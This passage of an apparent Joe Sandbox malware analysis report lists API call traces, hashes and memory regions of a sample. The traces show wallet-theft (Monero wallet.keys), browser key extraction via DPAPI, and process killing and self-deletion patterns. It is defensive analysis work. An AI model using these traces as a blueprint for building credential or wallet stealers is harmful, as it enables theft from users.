                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 53368b4d650111f1a83e2472dc967fb920018b9d115d012670150e1487f7e781
                              • Instruction ID: 6104bbabc12df88ba24e92fc3d1b7c7b06eca7bbff38a91e80192d51233dc66a
                              • Opcode Fuzzy Hash: 53368b4d650111f1a83e2472dc967fb920018b9d115d012670150e1487f7e781
                              • Instruction Fuzzy Hash: A50131F9A40208BFDB04DFE4DC49FAEB7B9EB48701F008159FA1997280D674AA01CF51
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 004C6663
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C6726
                              • ExitProcess.KERNEL32 ref: 004C6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: a78c32f3f4262585b21ee90d12ad63f35a2bd02eac5da74ff1d87298ebfe7c73
                              • Instruction ID: 366de0615512e7c27a5f6a2a61fe0ac3c3bdbb438da7d12028cbbd00493f1cf3
                              • Opcode Fuzzy Hash: a78c32f3f4262585b21ee90d12ad63f35a2bd02eac5da74ff1d87298ebfe7c73
                              • Instruction Fuzzy Hash: 8A314DF5801208ABDB54EB91DC82FED7778AF04308F40519EF20966191DF786B48CF6A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004D0E28,00000000,?), ref: 004C882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C8836
                              • wsprintfA.USER32 ref: 004C8850
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 9ce6366af78c6837f5c4233c53be09f08a48f3cd4c4717f9bc57bcdde89df035
                              • Instruction ID: 33fb7b4599fc276a5b0bc0e80561283ed252a23a44af25104f7fb0e14344beea
                              • Opcode Fuzzy Hash: 9ce6366af78c6837f5c4233c53be09f08a48f3cd4c4717f9bc57bcdde89df035
                              • Instruction Fuzzy Hash: A9211AB5A40208AFDB04DFD8DD49FBEBBB9FB48711F104119F619A7280C779A901CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004C951E,00000000), ref: 004C8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C8D62
                              • wsprintfW.USER32 ref: 004C8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 23efdb5d3a2c8ecf2541cd98d6fb55f983d8a701799cc13c007c572100189b41
                              • Instruction ID: 8450420981c91e453de1862acb81d4cfaf4ba007c300fb1eae3b04b4468db6d2
                              • Opcode Fuzzy Hash: 23efdb5d3a2c8ecf2541cd98d6fb55f983d8a701799cc13c007c572100189b41
                              • Instruction Fuzzy Hash: 34E08CB5A40208BFC700EBD4DC0AE6977B8EB04702F000195FD0E87280DAB19E00DB96
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 004BA3FF
                              • lstrlen.KERNEL32(00000000), ref: 004BA6BC
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 004BA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 4784ffacdbc52879d44cdc0d6dcf57eecf168c1d907a19665d841ee4a77388cf
                              • Instruction ID: d557c9f88a8c9c87c7739604d13c68bff3f0b096036f9a41fceb18839b9df124
                              • Opcode Fuzzy Hash: 4784ffacdbc52879d44cdc0d6dcf57eecf168c1d907a19665d841ee4a77388cf
                              • Instruction Fuzzy Hash: 86E1F17681010C9BCB54FBA5DC92FEE7338AF14308F50856EF51672091EE386A19CB7A
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BD481
                              • lstrlen.KERNEL32(00000000), ref: 004BD698
                              • lstrlen.KERNEL32(00000000), ref: 004BD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 004BD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 6da040b8e0ea3ffab90d414b8d8e11c5443208cfd3e7b3710ac10531374cb96f
                              • Instruction ID: 032b9e2de972a8855184f58acf3f0caaa15f65ddececdb108b4c9101cd616236
                              • Opcode Fuzzy Hash: 6da040b8e0ea3ffab90d414b8d8e11c5443208cfd3e7b3710ac10531374cb96f
                              • Instruction Fuzzy Hash: 9191FB7691010C9BCB44FBA1DC96FEE7339AF1430CF50456EF506A6091EE386A19CB7A
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BD801
                              • lstrlen.KERNEL32(00000000), ref: 004BD99F
                              • lstrlen.KERNEL32(00000000), ref: 004BD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 004BDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 27132db4a63115c4d8a8910bdc794db2d080b93eb3172ce373ba30d8ddf2c15b
                              • Instruction ID: b9ee0bee31caca892905ebe6e3c3169352fe86ceb54c7294ea1812ed1085dcb5
                              • Opcode Fuzzy Hash: 27132db4a63115c4d8a8910bdc794db2d080b93eb3172ce373ba30d8ddf2c15b
                              • Instruction Fuzzy Hash: 9081F0B591010C9BCB44FBA5DC96FEE7339AF1430CF50452EF406A6191EE386A19CB7A
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,004D1580,004D0D92), ref: 004BF54C
                              • lstrlen.KERNEL32(00000000), ref: 004BF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: d29869b6f3f2e8f6535e8a4a5b57c98ebe09dfb9a03d908e64e1e3ab2badd27e
                              • Instruction ID: f18929ae95a9b73cb053a2f1b05322fcb195a20e0a3c563613464f94cacd91a5
                              • Opcode Fuzzy Hash: d29869b6f3f2e8f6535e8a4a5b57c98ebe09dfb9a03d908e64e1e3ab2badd27e
                              • Instruction Fuzzy Hash: 0B512579D0010CABDB44FBA1DC56EED7338AF54308F50852EF81657191EE386A19CBBA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 0e60001746c051267f3df6e38b9b61f10bdc55e968c979cdbbb8bf69a86cc8c4
                              • Instruction ID: ac3db7e61b3b3e46bc27b7c62701095c4b3e28b92fd7ee085af51cd5a306639d
                              • Opcode Fuzzy Hash: 0e60001746c051267f3df6e38b9b61f10bdc55e968c979cdbbb8bf69a86cc8c4
                              • Instruction Fuzzy Hash: 17416DB9D10108ABCB44EFA5D855FFEB774AB44708F10801EE01667290DB79AA05CFAA
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004B9D39
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
                                • Part of subcall function 004B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004B4EEE,00000000,?), ref: 004B9B01
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9B2A
                                • Part of subcall function 004B9AC0: LocalFree.KERNEL32(?,?,?,?,004B4EEE,00000000,?), ref: 004B9B3F
                                • Part of subcall function 004B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004B9B84
                                • Part of subcall function 004B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 004B9BA3
                                • Part of subcall function 004B9B60: LocalFree.KERNEL32(?), ref: 004B9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 244a4f45811bcb02251bf294b9caef34fcdb55c2d0c8dc08558e94ee39199981
                              • Instruction ID: cbe72a6ee86e1e50a80e546349654eaeb8073531e49933cf3d6ab25239b73038
                              • Opcode Fuzzy Hash: 244a4f45811bcb02251bf294b9caef34fcdb55c2d0c8dc08558e94ee39199981
                              • Instruction Fuzzy Hash: 37313EB5D10209ABCF14DBE5DC85EEFB7B8AB48304F14451EEA05A7241E7399E04CBB9
                              APIs
                              • memset.MSVCRT ref: 004C94EB
                                • Part of subcall function 004C8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004C951E,00000000), ref: 004C8D5B
                                • Part of subcall function 004C8D50: RtlAllocateHeap.NTDLL(00000000), ref: 004C8D62
                                • Part of subcall function 004C8D50: wsprintfW.USER32 ref: 004C8D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004C95AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004C95C9
                              • CloseHandle.KERNEL32(00000000), ref: 004C95D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 0297132f2a9a888e225631d948a297c3799ed3e882267149e08ac3bb999acee7
                              • Instruction ID: 8117c7831172186bb640aebfa6279d4c19c2c45d4f2cf570b1eacc61adbb8dbf
                              • Opcode Fuzzy Hash: 0297132f2a9a888e225631d948a297c3799ed3e882267149e08ac3bb999acee7
                              • Instruction Fuzzy Hash: 53311DB5E00208AFDB14DFD0CD49FEDB775EB44304F10445EE50AAA284DB78AE45CB56
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004D05B7), ref: 004C86CA
                              • Process32First.KERNEL32(?,00000128), ref: 004C86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 004C86F3
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • CloseHandle.KERNEL32(?), ref: 004C8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: ac5c144bf0ec19ded660f50d59ccff47644a15e6bb926a21e8fc36c489f9cd9a
                              • Instruction ID: 7a9c99ded9585e7f85f6f1d66761229bef2c0fb3e77b1812298cd7871f9859a7
                              • Opcode Fuzzy Hash: ac5c144bf0ec19ded660f50d59ccff47644a15e6bb926a21e8fc36c489f9cd9a
                              • Instruction Fuzzy Hash: FC318FB5901118ABCB64EF91DC45FEEB778FF04704F1041AEE109A2190DB386E45CFA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004D0E00,00000000,?), ref: 004C79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,004D0E00,00000000,?), ref: 004C79C4
                              • wsprintfA.USER32 ref: 004C79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
